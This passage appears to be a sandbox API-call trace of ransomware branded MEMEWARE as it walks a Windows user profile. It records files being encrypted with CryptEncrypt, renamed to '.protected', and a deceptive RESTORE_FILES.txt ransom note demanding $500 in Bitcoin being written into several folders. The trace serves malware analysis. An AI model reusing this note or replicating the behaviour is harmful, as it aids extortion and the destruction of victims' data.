lpOverlapped=0x0) returned 1 [0094.725] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.725] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.725] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.725] CloseHandle (hObject=0x150) returned 1 [0094.725] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.protected") returned 85 [0094.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.protected")) returned 1 [0094.726] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Windows") returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Program Files") returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Program Files (x86)") returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="$Recycle.bin") returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="System Volume Information") returned 1 [0094.726] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0094.726] StrStrIW (lpFirst="WMSDKNS.XML", lpSrch=".protected") returned 0x0 [0094.726] lstrcmpW (lpString1="WMSDKNS.XML", lpString2="RESTORE_FILES.txt") returned 1 [0094.726] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.726] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.726] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0094.726] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".txt") returned 0x0 [0094.726] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0094.726] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".rar") returned 0x0 [0094.726] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0094.727] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".zip") returned 0x0 [0094.727] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x27cf, lpOverlapped=0x0) returned 1 [0094.761] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd831, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.761] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x27cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x27cf, lpOverlapped=0x0) returned 1 [0094.762] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.762] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.762] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.762] CloseHandle (hObject=0x150) returned 1 [0094.762] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.protected") returned 85 [0094.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.protected")) returned 1 [0094.763] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.763] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.763] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\RESTORE_FILES.txt") returned 81 [0094.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.776] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.776] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.777] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.777] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.777] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.777] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.777] CloseHandle (hObject=0x14c) returned 1 [0094.778] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.778] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.779] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\RESTORE_FILES.txt") returned 76 [0094.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.779] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.779] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.780] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.780] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.780] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.780] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.780] CloseHandle (hObject=0xd8) returned 1 [0094.781] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Windows") returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Program Files") returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Program Files (x86)") returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="$Recycle.bin") returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="System Volume Information") returned 1 [0094.781] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 60 [0094.781] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0094.781] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0094.781] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned 62 [0094.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.781] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.781] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.781] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.781] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.781] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.781] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\.") returned 62 [0094.782] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.782] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.782] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.782] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.782] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.782] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.782] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.782] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\..") returned 63 [0094.782] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.782] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.782] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="Windows") returned -1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="Program Files") returned -1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="Program Files (x86)") returned -1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="$Recycle.bin") returned 1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="System Volume Information") returned -1 [0094.782] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 68 [0094.782] lstrcmpW (lpString1="Gadgets", lpString2=".") returned 1 [0094.782] lstrcmpW (lpString1="Gadgets", lpString2="..") returned 1 [0094.782] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned 70 [0094.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.782] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.782] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.782] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.782] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.782] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.783] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\.") returned 70 [0094.783] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.783] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.783] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.783] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.783] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.783] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.783] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.783] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\..") returned 71 [0094.783] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.783] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.783] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.783] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.783] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\RESTORE_FILES.txt") returned 86 [0094.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.784] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.784] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.784] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.784] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.784] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.785] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.785] CloseHandle (hObject=0x14c) returned 1 [0094.785] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.785] lstrcmpiW (lpString1="Settings.ini", lpString2="Windows") returned -1 [0094.785] lstrcmpiW (lpString1="Settings.ini", lpString2="Program Files") returned 1 [0094.785] lstrcmpiW (lpString1="Settings.ini", lpString2="Program Files (x86)") returned 1 [0094.785] lstrcmpiW (lpString1="Settings.ini", lpString2="$Recycle.bin") returned 1 [0094.785] lstrcmpiW (lpString1="Settings.ini", lpString2="System Volume Information") returned -1 [0094.785] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0094.785] StrStrIW (lpFirst="Settings.ini", lpSrch=".protected") returned 0x0 [0094.785] lstrcmpW (lpString1="Settings.ini", lpString2="RESTORE_FILES.txt") returned 1 [0094.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.785] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.786] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0094.786] StrStrW (lpFirst="Settings.ini", lpSrch=".txt") returned 0x0 [0094.786] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0094.786] StrStrW (lpFirst="Settings.ini", lpSrch=".rar") returned 0x0 [0094.786] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0094.786] StrStrW (lpFirst="Settings.ini", lpSrch=".zip") returned 0x0 [0094.786] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x54, lpOverlapped=0x0) returned 1 [0094.787] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.787] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x54, 